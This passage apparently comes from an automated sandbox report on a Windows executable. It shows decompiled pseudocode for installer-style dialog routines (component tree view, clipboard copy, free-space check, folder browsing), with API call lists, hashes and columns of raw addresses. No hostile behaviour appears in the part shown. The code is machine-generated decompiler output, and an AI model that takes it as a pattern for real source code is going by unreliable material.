                                                                          • GetDlgItem.USER32 ref: 00404F1B
                                                                          • GetDlgItem.USER32 ref: 00404F2A
                                                                          • GetDlgItem.USER32 ref: 00404F39
                                                                            • Part of subcall function 00403DF8: SendMessageA.USER32(00000028,?,00000001,00403C2B), ref: 00403E06
                                                                          • GetClientRect.USER32 ref: 00404F67
                                                                          • GetSystemMetrics.USER32 ref: 00404F6F
                                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F90
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404FA1
                                                                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB4
                                                                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FC2
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD5
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FF7
                                                                          • ShowWindow.USER32(?,00000008), ref: 0040500B
                                                                          • GetDlgItem.USER32 ref: 00405021
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405031
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040504A
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405056
                                                                          • GetDlgItem.USER32 ref: 00405073
                                                                          • CreateThread.KERNEL32 ref: 00405081
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405088
                                                                          • ShowWindow.USER32(00000000), ref: 004050AC
                                                                          • ShowWindow.USER32(00000000,00000008), ref: 004050B1
                                                                          • ShowWindow.USER32(00000008), ref: 004050F7
                                                                          • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405129
                                                                          • CreatePopupMenu.USER32 ref: 0040513A
                                                                          • AppendMenuA.USER32 ref: 0040514F
                                                                          • GetWindowRect.USER32 ref: 00405162
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,00000000,00000000), ref: 00405184
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051BF
                                                                          • OpenClipboard.USER32(00000000), ref: 004051CF
                                                                          • EmptyClipboard.USER32(?,?,00000000,00000000,00000000), ref: 004051D5
                                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,00000000,00000000), ref: 004051DE
                                                                          • GlobalLock.KERNEL32 ref: 004051E8
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051FC
                                                                          • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 00405203
                                                                          • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040521A
                                                                          • SetClipboardData.USER32 ref: 00405225
                                                                          • CloseClipboard.USER32 ref: 0040522B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                          • String ID: {
                                                                          • API String ID: 1050754034-366298937
                                                                          • Opcode ID: bb195872a3db692d4f828066a8d1e4032435f681960caf5b55af3d3660bbe9d3
                                                                          • Instruction ID: a9b8c0cf866c2a3c8f14101a7fbd3d30c206ebeedcb3c516614c272958fa201a
                                                                          • Opcode Fuzzy Hash: bb195872a3db692d4f828066a8d1e4032435f681960caf5b55af3d3660bbe9d3
                                                                          • Instruction Fuzzy Hash: 59A14B70900208BFDB11AF61DD89EAE7F79FB04354F50813AFA05BA1A0C7759A41DFA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004046C3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E004046C3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42f448;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x42f428 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x42f431 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404643(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x42f430) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42a884;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42a898;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42a884 = _t315;
								 *0x42a898 = _t315;
								 *0x42f480 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x42f431 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42a898;
									_t196 =  *0x42f448;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x42f44c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										_t198 =  *0x42ebfc; // 0x7ef1da
										if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
											E00404561(0x3ff, 0xfffffffb, E00404616(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x42f44c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42a898);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42f480 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a898 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_v24 = LoadBitmapA( *0x42f420, 0x6e);
					 *0x42a894 = SetWindowLongA(_v8, 0xfffffffc, E00404CBD);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a884 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a884);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059FD(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DC3(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DC3(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a898 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a898 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a898 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x42f44c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DF8(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DF8(_v12);
								L89:
								return E00403E2A(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                                          0x004046e1
                                                                          0x004046e7
                                                                          0x004046e9
                                                                          0x004046ef
                                                                          0x004046f5
                                                                          0x00404702
                                                                          0x0040470b
                                                                          0x0040470e
                                                                          0x00404711
                                                                          0x00404932
                                                                          0x00404939
                                                                          0x0040494d
                                                                          0x0040493b
                                                                          0x0040493d
                                                                          0x00404940
                                                                          0x00404941
                                                                          0x00404948
                                                                          0x00404948
                                                                          0x00404959
                                                                          0x00404967
                                                                          0x0040496a
                                                                          0x00404980
                                                                          0x004049f8
                                                                          0x004049fb
                                                                          0x004049fd
                                                                          0x00404a07
                                                                          0x00404a15
                                                                          0x00404a15
                                                                          0x00404a17
                                                                          0x00404a21
                                                                          0x00404a27
                                                                          0x00404a48
                                                                          0x00404a29
                                                                          0x00404a36
                                                                          0x00404a36
                                                                          0x00404a27
                                                                          0x00404a21
                                                                          0x00000000
                                                                          0x004049fb
                                                                          0x00404985
                                                                          0x00404990
                                                                          0x00404995
                                                                          0x0040499c
                                                                          0x004049a3
                                                                          0x004049ad
                                                                          0x004049ad
                                                                          0x004049b1
                                                                          0x004049b6
                                                                          0x004049bb
                                                                          0x004049d1
                                                                          0x004049bd
                                                                          0x004049bd
                                                                          0x004049c5
                                                                          0x004049cc
                                                                          0x004049c7
                                                                          0x004049c7
                                                                          0x004049c7
                                                                          0x004049c5
                                                                          0x004049d5
                                                                          0x004049d7
                                                                          0x004049e5
                                                                          0x004049e6
                                                                          0x004049f2
                                                                          0x004049f5
                                                                          0x004049f5
                                                                          0x004049b6
                                                                          0x00000000
                                                                          0x004049a3
                                                                          0x00404987
                                                                          0x0040498e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404a4b
                                                                          0x00404a4b
                                                                          0x00404a52
                                                                          0x00404ac6
                                                                          0x00404acd
                                                                          0x00404ad9
                                                                          0x00404ad9
                                                                          0x00404ae2
                                                                          0x00404ae4
                                                                          0x00404aeb
                                                                          0x00404aee
                                                                          0x00404aee
                                                                          0x00404af4
                                                                          0x00404afb
                                                                          0x00404afe
                                                                          0x00404afe
                                                                          0x00404b04
                                                                          0x00404b0a
                                                                          0x00404b10
                                                                          0x00404b10
                                                                          0x00404b1d
                                                                          0x00404c6a
                                                                          0x00404c71
                                                                          0x00404c8e
                                                                          0x00404c94
                                                                          0x00404ca6
                                                                          0x00404ca6
                                                                          0x00000000
                                                                          0x00404b23
                                                                          0x00404b25
                                                                          0x00404b2d
                                                                          0x00404b31
                                                                          0x00404b31
                                                                          0x00404b39
                                                                          0x00404b7a
                                                                          0x00404b7c
                                                                          0x00404b8c
                                                                          0x00404b8f
                                                                          0x00404b94
                                                                          0x00404b9b
                                                                          0x00404b9e
                                                                          0x00404c40
                                                                          0x00404c46
                                                                          0x00404c4c
                                                                          0x00404c54
                                                                          0x00404c65
                                                                          0x00404c65
                                                                          0x00000000
                                                                          0x00404c54
                                                                          0x00404ba4
                                                                          0x00404ba7
                                                                          0x00404bad
                                                                          0x00404bb2
                                                                          0x00404bb4
                                                                          0x00404bb6
                                                                          0x00404bbc
                                                                          0x00404bc3
                                                                          0x00404bc8
                                                                          0x00404bcf
                                                                          0x00404bd2
                                                                          0x00404bd2
                                                                          0x00404bd9
                                                                          0x00404be5
                                                                          0x00404be9
                                                                          0x00404beb
                                                                          0x00404beb
                                                                          0x00404bdb
                                                                          0x00404bdd
                                                                          0x00404bdd
                                                                          0x00404c0b
                                                                          0x00404c17
                                                                          0x00404c26
                                                                          0x00404c26
                                                                          0x00404c28
                                                                          0x00404c2b
                                                                          0x00404c34
                                                                          0x00000000
                                                                          0x00404b3b
                                                                          0x00404b46
                                                                          0x00404b49
                                                                          0x00404b4e
                                                                          0x00404b50
                                                                          0x00404b54
                                                                          0x00404b64
                                                                          0x00404b6e
                                                                          0x00404b70
                                                                          0x00404b73
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404b56
                                                                          0x00404b56
                                                                          0x00404b5c
                                                                          0x00404b5e
                                                                          0x00404b5e
                                                                          0x00404b5f
                                                                          0x00404b60
                                                                          0x00000000
                                                                          0x00404b56
                                                                          0x00404b39
                                                                          0x00404b1d
                                                                          0x00404a5a
                                                                          0x00000000
                                                                          0x00404a70
                                                                          0x00404a7a
                                                                          0x00404a7f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404a91
                                                                          0x00404a96
                                                                          0x00404aa2
                                                                          0x00404aa2
                                                                          0x00404aa4
                                                                          0x00404ab3
                                                                          0x00404ab5
                                                                          0x00404abc
                                                                          0x00404abf
                                                                          0x00000000
                                                                          0x00404abf
                                                                          0x00404a5a
                                                                          0x00404717
                                                                          0x0040471c
                                                                          0x00404726
                                                                          0x00404727
                                                                          0x00404730
                                                                          0x0040473b
                                                                          0x00404756
                                                                          0x00404768
                                                                          0x0040476d
                                                                          0x00404778
                                                                          0x00404781
                                                                          0x00404796
                                                                          0x004047a7
                                                                          0x004047b4
                                                                          0x004047b4
                                                                          0x004047b9
                                                                          0x004047bf
                                                                          0x004047c1
                                                                          0x004047c4
                                                                          0x004047c9
                                                                          0x004047ce
                                                                          0x004047d0
                                                                          0x004047d0
                                                                          0x004047d3
                                                                          0x004047d4
                                                                          0x004047f0
                                                                          0x004047f0
                                                                          0x004047f2
                                                                          0x004047f3
                                                                          0x004047f8
                                                                          0x004047fb
                                                                          0x004047fe
                                                                          0x00404802
                                                                          0x00404807
                                                                          0x0040480c
                                                                          0x00404810
                                                                          0x00404815
                                                                          0x0040481a
                                                                          0x0040481c
                                                                          0x00404824
                                                                          0x004048ee
                                                                          0x00404901
                                                                          0x00000000
                                                                          0x0040482a
                                                                          0x0040482d
                                                                          0x00404830
                                                                          0x00404833
                                                                          0x00404833
                                                                          0x00404839
                                                                          0x0040483f
                                                                          0x00404842
                                                                          0x00404848
                                                                          0x00404849
                                                                          0x0040484e
                                                                          0x00404857
                                                                          0x0040485e
                                                                          0x00404861
                                                                          0x00404864
                                                                          0x00404867
                                                                          0x004048a3
                                                                          0x004048cc
                                                                          0x004048a5
                                                                          0x004048b2
                                                                          0x004048b2
                                                                          0x00404869
                                                                          0x0040486c
                                                                          0x0040487b
                                                                          0x00404885
                                                                          0x0040488d
                                                                          0x00404894
                                                                          0x0040489c
                                                                          0x0040489c
                                                                          0x00404867
                                                                          0x004048d2
                                                                          0x004048d3
                                                                          0x004048df
                                                                          0x004048df
                                                                          0x004048ec
                                                                          0x00404907
                                                                          0x0040490b
                                                                          0x00404928
                                                                          0x0040492d
                                                                          0x00404930
                                                                          0x00000000
                                                                          0x0040490d
                                                                          0x00404912
                                                                          0x0040491b
                                                                          0x00404ca8
                                                                          0x00404cba
                                                                          0x00404cba
                                                                          0x0040490b
                                                                          0x00000000
                                                                          0x004048ec
                                                                          0x00404824

                                                                          APIs
                                                                          • GetDlgItem.USER32 ref: 004046DA
                                                                          • GetDlgItem.USER32 ref: 004046E7
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404733
                                                                          • LoadBitmapA.USER32 ref: 00404746
                                                                          • SetWindowLongA.USER32 ref: 00404759
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040476D
                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404781
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404796
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047A2
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047B4
                                                                          • DeleteObject.GDI32(?), ref: 004047B9
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047E4
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047F0
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404885
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048B0
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048C4
                                                                          • GetWindowLongA.USER32 ref: 004048F3
                                                                          • SetWindowLongA.USER32 ref: 00404901
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404912
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A15
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A7A
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A8F
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AB3
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AD9
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404AEE
                                                                          • GlobalFree.KERNEL32 ref: 00404AFE
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B6E
                                                                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C17
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C26
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C46
                                                                          • ShowWindow.USER32(?,00000000), ref: 00404C94
                                                                          • GetDlgItem.USER32 ref: 00404C9F
                                                                          • ShowWindow.USER32(00000000), ref: 00404CA6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N
                                                                          • API String ID: 1638840714-813528018
                                                                          • Opcode ID: 492e76265ab7cc4ed03b52ac64fc1ec799b063a37a97735f7d713d4af27fae02
                                                                          • Instruction ID: a703f14ce3faa2e4f8142ea310930ebcb38104dd784f52016b44af4a551de8a9
                                                                          • Opcode Fuzzy Hash: 492e76265ab7cc4ed03b52ac64fc1ec799b063a37a97735f7d713d4af27fae02
                                                                          • Instruction Fuzzy Hash: B602AFB0E00209AFDB21DF54CC45AAE7BB5FB84314F10817AF610BA2E1C7799A52CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404201, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00404201(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				intOrPtr _t136;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x42a078;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052BF(0x3fb, _t151);
					E00405C17(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052BF(0x3fb, _t151);
							if(E004055C8(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059DB(0x429870, _t151);
							_t80 = E0040557B(0x429870);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CEE("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x429870,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x429870);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E00404616(5)) {
									_v8 = 2;
								}
								_t136 =  *0x42ebfc; // 0x7ef1da
								if( *((intOrPtr*)(_t136 + 0x10)) != 0) {
									E00404561(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x429860);
									} else {
										E00404561(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x42f4c4 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DE5(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42a890 == 0) {
									E00404196();
								}
								 *0x42a890 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x42a8a0;
							_v76 = _a4;
							_v68 = 0x42a8a0;
							_v56 = E004044FB;
							_v52 = _t151;
							_v64 = E004059FD(0x3fb, 0x42a8a0, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x429c78, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E00405238(0, _t110);
								E004054E8(_t151);
								_t114 =  *((intOrPtr*)( *0x42f428 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059FD(0x3fb, 0x42a8a0, _t151);
									_t144 = 0x42e3c0;
									if(lstrcmpiA(0x42e3c0, 0x42a8a0) != 0) {
										lstrcatA(_t151, 0x42e3c0);
									}
								}
								 *0x42a890 =  *0x42a890 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405554(_t151) != 0 && E0040557B(_t151) == 0) {
						E004054E8(_t151);
					}
					 *0x42ebf8 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
